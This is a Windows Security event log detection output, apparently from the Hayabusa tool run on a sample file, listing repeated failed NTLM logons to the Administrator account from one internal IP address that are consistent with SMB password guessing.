2016-09-20 01:51:27.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gdo1txjJXiRLbUDH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.785 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JK8jP3ftKQOyutGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DdbEjo88dBJRhrKp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FZCVkXkwhbuSM654 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z2mc9WScfBa88rtO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.011 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lee7qYLkXQoz8rRh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.057 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f5g1ZKpZuZU1WRoC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h4ST7RrHJxAQHHbn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GtW1hBHF97YqvN4N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.189 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xVKlPytPofO9LQBm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.235 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GOkZ9yjvfL51UYXo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fAxfxSbRqGO7Dej0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.313 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D7XmvDYk6zFLir09 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.355 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mWcl6CKdSMxd8edZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SxBQlFZvGBqDdobn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.435 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AXN94VanwME6q8rc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.467 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JOj7CZ3stJXePY8b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXjmqxguFGL3f8cV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qHWmdxnRrMbxrdlN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.681 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6ROBnjuyHn4FRugk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.754 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zGxuUxasL680O21l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.812 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CYoM984EzAkUtBoa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0e3ATNpzeeAf6Qax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1A0dGhpVy8kgiRP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xGgNAKJM5RAt9B5K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c3DpedXujvQpZnjQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.019 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BsaSjESaUHbsIxJL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.062 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ca4dlxyEco3VOapw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.100 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Z6lJc7DXAOcNZ2G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Olt5mS7na07VDJE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oCFeQcUMDTs0ev8v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.233 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FYmH6CQrizoZ1DAx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iYtujXkzySwZQFk8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.327 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KE9v6wzrebvjvDIl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.365 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 81gmRFFBHI1s4dqi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C8gHWPDjQM8M3tiQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: szj4mJvtFV06CuR2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.493 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ceGEl87hOM0InAAd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XRv3C3rRxYXTgckj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.581 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TaPkJPIQnbL3VyUC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.618 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LZ7PZAT6hWWHNc29 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AJVD4uVhwfLSJ6Ab | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q6KME1I6tE0v9UAq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.751 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Qtt1rk4n3tOJko2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: prPsA8EZHGfGPSHm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TQqGXnwHtB87LSzT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.870 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6uLT1bjaIS0XBsWC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PIgpraQTxFrcLphN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.957 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1D6qy57XImq4prx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Kw44Ffh4DIPlyuM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oKUdmKU74RmJysAx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gZUTzZw0T1tYRSP5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nEOfjuAMa7HTsfcP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.243 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e7bG19emMTmyBQNm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YsLkgWukfqS3wWJK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: liFcZjjpY3xXwe9j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vBUgbfzx2OEcOxWL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iVCV0WoZmLTFNH71 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.516 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZJmxGOqck4oQi1kL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.561 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w7lYqaUvEtTp18DK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yZ9xQmGn61JJDeQS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XuMXpvY9fmLm0eBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ofesuNErTLWuN0k4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KsNq7SThd3b8oTwF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.797 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmRWg5gNRcxDMFjg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JXrGn6LehVwTGNNj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vIq9DS71jCjWbgdY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.937 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kw2BQbdUml0EPNOs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ugOqsKQFGmmLac3s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3rZHUbOUVBYiHarB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: otv8ByrbWWoTz7pi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HVlHkJu4Gxc9dhxM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xKF5OCqLVVKvung0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.162 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: avAdpkOlP0xji1vG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.214 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VFgzMjEz6M0LBnX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
